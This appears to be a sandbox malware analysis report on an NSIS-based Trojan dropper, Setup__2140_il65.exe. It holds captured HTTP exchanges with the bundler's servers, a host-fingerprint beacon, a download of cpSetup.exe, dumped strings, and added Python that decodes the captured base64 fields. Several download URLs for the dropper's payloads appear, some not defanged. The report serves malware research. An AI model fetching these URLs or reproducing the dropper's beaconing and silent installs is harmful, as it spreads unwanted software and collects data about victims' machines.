X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
1b79....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.downloadcrest.com/V35/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZX
<<< skipped >>>
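The POST to index.php above is the host fingerprint that the injected Setup__2140_il65.exe reports to VVV.secularistsarakolet.site before the offer page is rendered. Three fields (mac, machg, name) are base64. The Python below is an added example rather than code from the report: it decodes those fields, converts the ts value to UTC and compares it with the server's Date header, and pulls out the fields a case note would cite. It assumes the base64 fields are NUL-terminated strings, which is why each decodes to text plus a trailing 0x00 byte; the request body and Date header are copied from the exchange above.

```python
import base64
from datetime import datetime, timezone
from urllib.parse import parse_qsl

# Constructed copy of the POST /index.php body above.
TELEMETRY_BODY = (
    "Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv="
    "&Sysid=C8318CA6891F5119A9FD96EC19E98D71&Sysid1=C8318CA6891F5119A9FD96EC19E98D71"
    "&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=Setup__2140_il65.exe"
    "&dprod=19C2FB3DEC385401F6FCF22178334A&exe=Setup__2140_il65&ffver="
    "&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA=="
    "&name=WFA3AA==&netfs=3&ts=1463090333&ver=1.1.5.26"
)
# Date header of the server's reply, used for clock correlation.
RESPONSE_DATE = "Thu, 12 May 2016 21:58:46 GMT"

# Fields that carry base64 in the capture. Assumption: each is a
# NUL-terminated C string encoded whole, hence the trailing 0x00 byte.
B64_FIELDS = ("mac", "machg", "name")


def parse_beacon(body: str) -> dict:
    """Form-decode the beacon, base64-decode the binary fields and add an
    ISO-8601 rendering of the ts epoch value."""
    fields = dict(parse_qsl(body, keep_blank_values=True))
    for key in B64_FIELDS:
        raw = base64.b64decode(fields[key])
        fields[key] = raw.rstrip(b"\x00").decode("ascii", errors="replace")
    ts = datetime.fromtimestamp(int(fields["ts"]), tz=timezone.utc)
    fields["ts_utc"] = ts.isoformat()
    return fields


def clock_skew_seconds(fields: dict, http_date: str) -> int:
    """Sandbox clock (ts) minus server clock (Date header), in seconds."""
    server = datetime.strptime(http_date, "%a, %d %b %Y %H:%M:%S GMT")
    server = server.replace(tzinfo=timezone.utc)
    return int(fields["ts"]) - int(server.timestamp())


def host_fingerprint(fields: dict) -> dict:
    """The subset of the beacon an analyst would carry into a case note."""
    return {
        "os": fields["OSversion"],
        "x64": fields["X64"] == "Y",
        "admin": fields["admin"] == "Y",
        "browser": fields["browser"],
        "machine_guid": fields["machg"],
        "computer_name": fields["name"],
        "dotnet": [v for v in (fields["Net1.1"], fields["Net2"], fields["Net4"]) if v],
        "dropper": fields["cmdl"],
        "installer_version": fields["ver"],
    }


if __name__ == "__main__":
    beacon = parse_beacon(TELEMETRY_BODY)
    print(host_fingerprint(beacon))
    print("ts:", beacon["ts_utc"], "skew:", clock_skew_seconds(beacon, RESPONSE_DATE), "s")
```

machg decodes to a GUID-shaped machine identifier and name to the sandbox's computer name; mac is an empty string. Sysid and Sysid1 are 32 hex characters, an MD5-sized value, but nothing in the capture says what they hash. admin=Y here and uac=1 in the InstallCapital URLs are the two places the capture records the privilege level the offers were selected for. The ts field is seven seconds ahead of the server's Date header, close enough to confirm that ts is a plain Unix epoch in UTC.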
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Content-Length: 334
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=0&_ver=1.1.5.26&_p=1&_s=20&_cc=UA&_cid=2140&_psb=0&_cnt=8090dd4d0f36f257c0d595bbfe802c92&_instid=l65&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_NationZoom=1&r_JinshanDuba=3&r_SputnikSearch=2&r_YesSearches=1&DownloadManagerModern=3&NationZoom=1&JinshanDuba=1&SputnikSearch=1&YesSearches=4
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 12 May 2016 21:58:48 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 4590
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps>DownloadManagerModern</comps><short_name>DownloadManagerModern</short_name><must_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZXJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyLnBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CQoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFuayIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI UHJpdmFjeSBQb2xpY3k8L2E PGJyIC8 CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTwvZGl2PgoJPC9kaXY Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhbWlfZGVjX2RpdiI CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN0YWxsZXI8L2I PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvbnRpbnVlIGluc3RhbGxpbmcgeW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQgYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDogMTMwcHgiPiAKCQk8YnIgLz4KCQkJPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUiIHN0eWxlPSJ3aWR0aDogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9wOiA
<<< skipped >>>
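Two fragments in this capture are base64 that the report's <<< skipped >>> marker cuts off: the g_eula variable in the index.php reply above and the <bdy> element of the finalize.php reply. In <bdy> the capture also shows a space wherever the base64 alphabet would have '+'; a base64 decoder silently drops the spaces, so everything after the first one decodes misaligned. The Python below is an added example, not part of the report: it restores the '+' characters, decodes what survives of each truncated string, and lists the URLs the offer page body links to. The constants are copied from the two replies; that the spaces stand for '+' is an assumption, checked by the result decoding to well-formed HTML.

```python
import base64
import binascii
import re

# Constructed copies of the two truncated base64 strings above.
EULA_B64 = (
    "VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZpbGUgaXMgcnVu"
    "IGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQi"
    "IG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBh"
    "dGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZX"
)
# Spaces kept exactly as the capture shows them (assumed to be '+').
BDY_B64 = (
    "CjxkaXYgaWQ9ImFtaV9kX21hbmFnZXJfYm9keSI "
    "Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI "
    "CQoJCTxpbWcgaWQ9ImFtaV9pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25f"
    "aW5zdGFsbGVyLnBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI "
    "CQoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJn"
    "ZXQ9Il9ibGFuayIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI "
    "UHJpdmFjeSBQb2xpY3k8L2E "
    "PGJyIC8 "
    "CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2luZGV4Lmh0bWwiIHRhcmdldD0i"
    "X2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5IZWxwPC9hPjxiciAvPgoJCQk8YSBocmVmPSJodHRw"
    "Oi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9jb250YWN0LXVzLmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHls"
    "ZT0iY29sb3I6IHdoaXRlIj5Db250YWN0IHVzPC9hPgoJCTwvZGl2PgoJPC9kaXY "
    "Cgk8ZGl2IGlkPSJhbWlfYm9keV90ZXh0Ij4KCQk8ZGl2IGlkPSJhbWlfZGVjX2RpdiI "
    "CgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5TZXR1cCA8Yj5pbnN0YWxsZXI8L2I "
    "PC9zcGFuPgkJCgkJCTxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlRvIGNvbnRpbnVlIGluc3RhbGxpbmcg"
    "eW91ciBhcHBsaWNhdGlvbiwgY2xpY2sgb24gdGhlIE5leHQgYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4K"
    "CQkJCQoJCTxkaXYgaWQ9ImRfYW1pX0Rvd25sb2FkTWFuYWdlck1vZGVybiIgc3R5bGU9ImhlaWdodDog"
    "MTMwcHgiPiAKCQk8YnIgLz4KCQkJPGRpdiBkYXRhLWFkanVzdC1oZWlnaHQ9IjAiIGlkPSJtaWRkbGUi"
    "IHN0eWxlPSJ3aWR0aDogMTAwJTsgcGFkZGluZzogMHB4OyBoZWlnaHQ6IDExMHB4OyBtYXJnaW4tdG9w"
    "OiA"
)

LINK_RE = re.compile(r'(?:href|src)="([^"]*)"')


def repair_plus(s: str) -> str:
    """Put back the '+' characters the capture rendered as spaces."""
    return s.replace(" ", "+")


def decode_truncated_b64(s: str) -> str:
    """Decode a base64 string whose tail was cut mid-quantum: a dangling
    single character can never be decoded, so drop it; otherwise pad."""
    s = s.strip()
    if len(s) % 4 == 1:
        s = s[:-1]
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode("utf-8", errors="replace")


def naive_decode(s: str):
    """Decoding without the repair: b64decode discards the spaces, so the
    text is garbled from the first lost '+' onward, or padding fails."""
    try:
        return base64.b64decode(s).decode("utf-8", errors="replace")
    except binascii.Error:
        return None


def extract_links(html: str) -> list:
    """href/src targets in order of appearance; the page puts a stray space
    inside one href, so each value is stripped."""
    return [m.strip() for m in LINK_RE.findall(html)]


def recovered_fragments() -> dict:
    return {
        "eula": decode_truncated_b64(EULA_B64),
        "bdy": decode_truncated_b64(repair_plus(BDY_B64)),
    }


if __name__ == "__main__":
    frags = recovered_fragments()
    print(frags["eula"])
    print(extract_links(frags["bdy"]))
```

The recovered page body names InstallPath (privacy, help and contact links on installpath.com) as the bundler, shows the attacker-chosen icon from pe-sixi.com, and titles the dialog "Setup installer" using the appname that pe-sixi.com passed through the appsetupurl parameter, so the consent screen the user saw was assembled from parameters under the affiliate's control.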
GET /Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.secularistsarakolet.site
Connection: Keep-Alive
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
Date: Thu, 12 May 2016 21:58:48 GMT
ETag: "24c41-7262-5328b8d5eeccc"
Last-Modified: Wed, 11 May 2016 06:57:17 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Length: 29282
Connection: keep-alive
.PNG........IHDR.......s.....`..1....pHYs...............9.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 ">. <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/". xmlns:dc="hXXp://purl.org/dc/elements/1.1/". xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/". xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2014 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-03-16T16:09:11 02:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-16T16:23:05 02:00</xmp:ModifyDate>. <xmp:MetadataDate>2016-03-16T16:23:05 02:00</xmp:MetadataDate>. <dc:format>image/png</dc:format>. <photoshop:ColorMode>3</photoshop:ColorMode>. <xmpMM:InstanceID>xmp.iid:36122a74-ac0f-5d40-8bf0-cb214281bd07</xmpMM:InstanceID>. <xmpMM:DocumentID>adobe:docid:photoshop:1f386400-eb82-11e5-9c68-b3c1a0aff854</xmpMM:DocumentID>. <xmpMM:OriginalDocumentID>xmp.did:ff769801-1319-ee4c
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:54 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 23503
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GwTgHFdoISZkzBjhmS03rIHfHoS0eB17BdfxNcYAUGhPfPV-QSjtRg==
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:55 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 33966
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: KuEvsOr3zBFpfWbfx-6VzBKR_uzo9NBxRIjFUr0s1IAudC0z46Sm4Q==
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Sat, 12 Dec 2015 03:13:59 GMT
Content-Disposition: attachment; filename="next.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 21980
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _pf7A1s5gUmMDTPqgxT_w007CC28IttnXMmir4pleetmsCZdbVeFng==
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.secularistsarakolet.site/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2157
Connection: keep-alive
Date: Sat, 12 Mar 2016 07:10:57 GMT
Content-Disposition: attachment; filename="finish.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "ba2e9f310f01397a1f41cb6a7ab2e3c9"
Accept-Ranges: bytes
Server: AmazonS3
Age: 21979
X-Cache: Hit from cloudfront
Via: 1.1 16a8156bb9e085b1e79a6bf5cb89d49e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: DAYyOWr_G-eK7FsfLGsyvCBPLTI84olBSQY9JY4CB0kMa7bSXwlBUg==
<<< skipped >>>
GET /?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0
Host: get.wenter3.space
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 350208
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Thu, 12 May 2016 21:58:13 GMT
X-Cache: Miss from cloudfront
Via: 1.1 b4ee4db849dcb5fce83f0bc3d6a9d57f.cloudfront.net (CloudFront)
X-Amz-Cf-Id: xeMckmYpslwK8ecETGD0QgaHiG7WYlLxCn0xbPK12tbiuJInRXcPeQ==
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1764:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"
1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp\NSISdl.dll
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
.vN {
({,{
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\cpSetup.exe
Setup__2140_il65.exe
SETUP_~1.EXE
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt
ersion=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
up__2140_il65.exe
ps.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh2.tmp
hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hXXp://pe-ma3i.info/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7
Nullsoft Install System v2.46
Setup__2140_il65.exe_1408:
.text
`.rdata
@.data
.rsrc
@.reloc
FTPQ
j.Yf;
_tcPVj@
.PjRW
1.2.8
inflate 1.2.8 Copyright 1995-2013 Mark Adler
GetProcessWindowStation
operator
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
115 115 15 26 124 30 115 85
113 127 13 27 75 23 88 101 6
112 82 42 76 58 85 83 122 15
112 95 37
112 115 23 59 75
112 115 23 47 97 3 82 122
123 121 2 27 65 24 88 120 34
123 121 2 27 65 24 88 120 52
89 98 7 19 100 85 83 122 15
89 101 15 16 103 16 66 102
88 122 6 76 58 85 83 122 15
101 115 2 27 78 18 91 115
101 115 15 26 105 8 82 82 32
68 100 21
96 100 10 11 109 61 94 122 6
64 100 8 12 124
KERNEL32.dll
GetProcessHeap
GetCPInfo
zcÃ
.sYPELN
.Hfs-
%\sA.br
sG%F`l
k.gJw
H%UtC
pz.rSDz
#.mlz
j%u5Q
dO~.gnM
.Ng)Gy:o
PX'.RS>
A!N%d)
YSshqh
2.PAP
al0f
%fTeN
7*1%x
XG.bK
.Ap 6
.uE=z)
y%xv/
?b.hUuF3
.SRR*
%UT o
.PdbRH
9604604
hFAÃ’J
.wrCc
TV%%Ux
4..Sp
J[%Um
.Vj3b
>.QXlQ
^P.em
.pfm(
}V%%U
^kG%D
HHB.HHB.
1-2
6l6P6A
11F1X1d1q1
1 141:1\1
2'252?2[2`2
> ?7?@?|?
8&9-949@9
9(9,989@9\9|9
Cmscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
109 90 121
103 67 12
122 93 120
126 74 111 105 70 68 104
16 103 70 92 111 97 67 113
126 106 79 73 70 100 72
125 82 105 105
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe
3.21.12.38
bor.exe
Setup__2140_il65.exe_1408_rwx_02480000_000B3000:
.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
t/lURlhE7oHSekJAUfGI1XZRfHbqjOY=
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
sNRhTgJj9pbUckcMdOyB0GdGSDe7gLs=
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
t/lURlhH/5DZVVFDeteg/XpQWEA=
%c%c%c%c
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÃ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;
!"#$%&'()* ,-./0123
carpel.groveled.1 = s 'Inst Class'
CLSID = s '{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}'
carpel.groveled = s 'Inst Class'
CurVer = s 'carpel.groveled.1'
ForceRemove {320195d8-a8c1-4b82-b50e-6e2fe7b25b99} = s 'Inst Class'
ProgID = s 'carpel.groveled.1'
VersionIndependentProgID = s 'carpel.groveled'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
